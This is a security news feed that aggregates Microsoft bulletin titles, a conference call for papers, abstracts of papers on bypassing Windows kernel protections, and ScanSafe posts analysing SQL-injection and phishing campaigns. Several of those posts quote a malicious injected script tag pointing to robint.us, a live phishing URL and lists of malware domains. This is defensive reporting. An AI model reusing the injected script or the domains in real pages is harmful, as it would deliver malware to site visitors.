http://www.hackinthebox.org/backend.php Microsoft is showing off prototypes of some of the fruits of its research labs from around the world, many of which have big-data, machine-learning and natural-user-interface tie-ins. TechFest, the 2013 version of Microsoft's annual research and development showcase, kicked off this week on March 5. March 5 was the only day that TechFest is open to non-employees. A number of press, customers and partners had a chance to see a subset of the research projects that Microsoft will be highlighting throughout the week. Tags: MicrosoftHardware

==> Pwn2Own, Pwnium Attract Dollars and 0-Days by the Bushel

http://www.hackinthebox.org/backend.php The new year is barely two months old and it's already been a brutal one for the disclosure of new vulnerabilities. Java, Adobe Reader, Flash, Google Chrome and a number of other widely deployed applications have all been hit with a slew of serious bugs in just the last few weeks. And that's likely to get worse this week as researchers convene in Vancouver for the Pwn2Own and Pwnium hacking contests. Tags: CanSec, Pwn2Own, Pwnium, Google Chrome, Microsoft, IE, Security, Hackers

==> Microsoft might owe the Danish tax man $1bn

http://www.hackinthebox.org/backend.php Denmark wants Microsoft to pay $1 billion in back taxes in one of the biggest tax cases in the country's history, local media reported on Monday. The Danish tax authority is in negotiations with Microsoft over unpaid taxes stemming from the $1.88 billion takeover of Danish software company Navision in 2002, Danish Radio DR said, quoting unnamed sources. Tags: Microsoft, Denmark, Law and Order

==> EU Fines Microsoft $732 Million In Browser Brawl

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft stopped offering the browser-choice screen to European Windows consumers, in violation of its 2009 agreement with antitrust regulators.

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement.

The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security.

Paper Submission Process: Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference.

Paper Format: Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits.

Tutorial Submissions: Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website.

Important Dates:
- Paper submission due: Friday, May 6, 2011 (23:59 UTC-11)
- First round reviews communicated to authors: Monday, June 20, 2011
- Author comments due on: Thursday, June 23, 2011 (23:59 UTC-11)
- Acceptance notification: Friday, July 15, 2011
- Final papers due: Thursday, August 11, 2011

GENERAL CHAIR: Yan Chen (Northwestern University, USA)

PROGRAM CHAIRS: George Danezis (Microsoft Research, UK), Vitaly Shmatikov (University of Texas at Austin, USA)

PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany), Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France), Dan Boneh (Stanford University, USA), Nikita Borisov (University of Illinois at Urbana-Champaign, USA), Herbert Bos (VU, Netherlands), Srdjan Capkun (ETHZ, Switzerland), Avik Chaudhuri (Adobe Advanced Technology Labs, USA), Shuo Chen (Microsoft Research, USA), Manuel Costa (Microsoft Research, UK), Anupam Datta (CMU, USA), Stephanie Delaune (CNRS and ENS-Cachan, France), Roger Dingledine (The Tor Project, USA), Orr Dunkelman (University of Haifa and Weizmann Institute, Israel), Ulfar Erlingsson (Google, USA), Nick Feamster (Georgia Tech, USA), Bryan Ford (Yale University, USA), Cedric Fournet (Microsoft Research, UK), Paul Francis (MPI-SWS, Germany), Michael Freedman (Princeton University, USA), Guofei Gu (Texas A&M University, USA), Nicholas Hopper (University of Minnesota, USA), Collin Jackson (CMU Silicon Valley, USA), Markus Jakobsson (Paypal, USA), Jaeyeon Jung (Intel Labs Seattle, USA), Apu Kapadia (Indiana University Bloomington, USA), Jonathan Katz (University of Maryland, USA), Stefan Katzenbeisser (TU Darmstadt, Germany), Arvind Krishnamurthy (University of Washington, USA), Christopher Kruegel (University of California, Santa Barbara, USA), Ralf Kuesters (University of Trier, Germany), Ninghui Li (Purdue University, USA), Benjamin Livshits (Microsoft Research, USA), Heiko Mantel (TU Darmstadt, Germany), John Mitchell (Stanford University, USA), Fabian Monrose (University of North Carolina at Chapel Hill, USA), Steven Murdoch (University of Cambridge, UK), David Naccache (Ecole Normale Superieure, France), Arvind Narayanan (Stanford University, USA), Kenny Paterson (Royal Holloway, University of London, UK), Niels Provos (Google, USA), Mike Reiter (University of North Carolina at Chapel Hill, USA), Thomas Ristenpart (University of Wisconsin, USA), Hovav Shacham (University of California, San Diego, USA), Adam Smith (Pennsylvania State University, USA), Anil Somayaji (Carleton University, Canada), Francois-Xavier Standaert (UCL, Belgium), Eran Tromer (Tel Aviv University, Israel), Leendert Van Doorn (AMD, USA), Paul Van Oorschot (Carleton University, Canada), Bogdan Warinschi (University of Bristol, UK), Brent Waters (University of Texas at Austin, USA), Robert Watson (University of Cambridge, United Kingdom), Xiaowei Yang (Duke University, USA), Haifeng Yu (National University of Singapore, Singapore)

==> RSA 2013: Microsoft VP predicts a sunny outlook for information security

http://www.infosecurity-magazine.com/rss/news/ Despite years of bad press for organizations across all sectors, Scott Charney says the information security industry continues to meet the challenges it faces as they develop.

==> A hacker's dream: two-thirds of SharePoint users have no security policy

http://www.infosecurity-magazine.com/rss/news/ Even though Microsoft SharePoint is widely deployed throughout enterprises and SMBs as a collaboration platform, a shocking two-thirds of SharePoint-using companies in a recent survey have admitted to having no active security policy in place for the application.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 9.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-020 - Critical : Vulnerability in OLE Automation Could Allow Remote Code Execution (2802968) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-012 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2809279) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for February 2013 - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-019 - Important : Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege (2790113) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-018 - Important : Vulnerability in TCP/IP Could Allow Denial of Service (2790655) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-017 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-016 - Important : Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778344) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-015 - Important : Vulnerability in .NET Framework Could Allow Elevation of Privilege (2800277) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-014 - Important : Vulnerability in NFS Server Could Allow Denial of Service (2790978) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-013 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2784242) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-011 - Critical : Vulnerability in Media Decompression Could Allow Remote Code Execution (2780091) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-010 - Critical : Vulnerability in Vector Markup Language Could Allow Remote Code Execution (2797052) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-009 - Critical : Cumulative Security Update for Internet Explorer (2792100) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-006 - Important : Vulnerability in Microsoft Windows Could Allow Security Feature Bypass (2785220) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-005 - Important : Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-004 - Important : Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2769324) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-057 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for January 2013 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-008 - Critical : Security Update for Internet Explorer (2799329) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2798897): Fraudulent Digital Certificates Could Allow Spoofing - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2794220): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-007 - Important : Vulnerability in Open Data Protocol Could Allow Denial of Service (2769327) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-003 - Important : Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege (2748552) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-002 - Critical : Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (2756145) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-001 - Critical : Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution (2769369) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (973811): Extended Protection for Authentication - Version: 1.14

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-078 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2783534) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for December 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-082 - Important : Vulnerability in DirectPlay Could Allow Remote Code Execution (2770660) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 5.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-083 - Important : Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass (2765809) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-080 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2784126) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-079 - Critical : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2780642) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-077 - Critical : Cumulative Security Update for Internet Explorer (2761465) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-073 - Moderate : Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure (2733829) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-074 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2745030) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-072 - Critical : Vulnerabilities in Windows Shell Could Allow Remote Code Execution (2727528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for November 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-076 - Important : Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2720184) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-075 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2761226) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-071 - Critical : Cumulative Security Update for Internet Explorer (2761451) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-minded colleagues, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper, which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community, especially those dealing with malware analysis and the corresponding investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is, so to speak, an unintended implication of Microsoft's WOW64 technology and the corresponding redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback, feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest buzz in the e-world. But now almost all have it. And it's still fresh, owing to the fact that it's like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION. DEFINING DLL. According to Microsoft, “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination! Microsoft's WorldWide Telescope released, May 12th, 2008. Any Star Wars or Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsoft's entrant to the [...]

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as "PatchGuard"), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public ("PatchGuard 3"). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing with (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corporate mail; very few have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corporate spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip. The zip itself extracts into an executable. However, a double-extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file (the spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the “doc”, in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B, Mal/EncPk-YJ, Trojan.Win32.Menti.gjgn, Trojan-Spy.Win32.SpyEyes.hdy. First observed encounter was 05-may-11 at 11:38:05 GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; it's actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises:
* A total of 42 malware domains have been observed during the 7 months this attack has been ongoing;
* The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT;
* Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains;
* 99.85% of encounters have involved malware domains that were non-resolvable (shut down / offline) at the time of encounter;
* 55% of the encounters occurred on March 25th when the Lizamoon domain was added;
* The high rate of encounters on the 25th was solely due to a single high-profile website that was compromised;
* Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content).
Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011:

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William’s impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three important things:
1. Major breaking news events are favorite themes for malware purveyors and scammers;
2. Clicking unsolicited links in email and IM is a frequent path of infection;
3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials.
Cisco ScanSafe research indicates that 3 out of every 100 malware encounters result from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of every 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email:
"Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking."
Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now gramsbbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing hosts enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL-injected iframes pointing to malware on robint.us. (That number has been over-inflated to over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic.) Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site wasn't the result of a compromise of WSJ directly, but rather the result of a compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster Child for Repeat Injections

http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is: script src=http://ww.robint.us/u.js

Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name, or omit the quotes, and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at, but it's certainly not a million pages, and it is certainly nothing new: many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007.

On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May.
* 16196 unique malicious domains.
* The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
* Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
* Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
* Gumblar was the second most prevalent Web malware encountered, at 7%.
* Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.

Top Ten Malicious Domains, May 2010
holasionweb.com* - 7%
www.sitepalace.com - 3%
losotrana.com* - 2%
indesignstudioinfo.com* - 2%
kdjkfjskdfjlskdjf.com* - 2%
easfindnex.org - 2%
findermar.org - 2%
76.73.33.109 - 2%
findrasup.org - 1%
zettapetta.com* - 1%
*Related to attacks against GoDaddy-hosted websites

Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including:
1 & 1
DreamHost
In2Net
Hostway
Media Temple
ServerBeach
and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites.

Google / WordPress Pharma Hacks
In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post, and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised) site that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used.

Grepad.com Attacks
The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit drugs, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attempted in order to download this malware. A list of observed exploits can be found in this blog post.

Commonalities Between Attacks
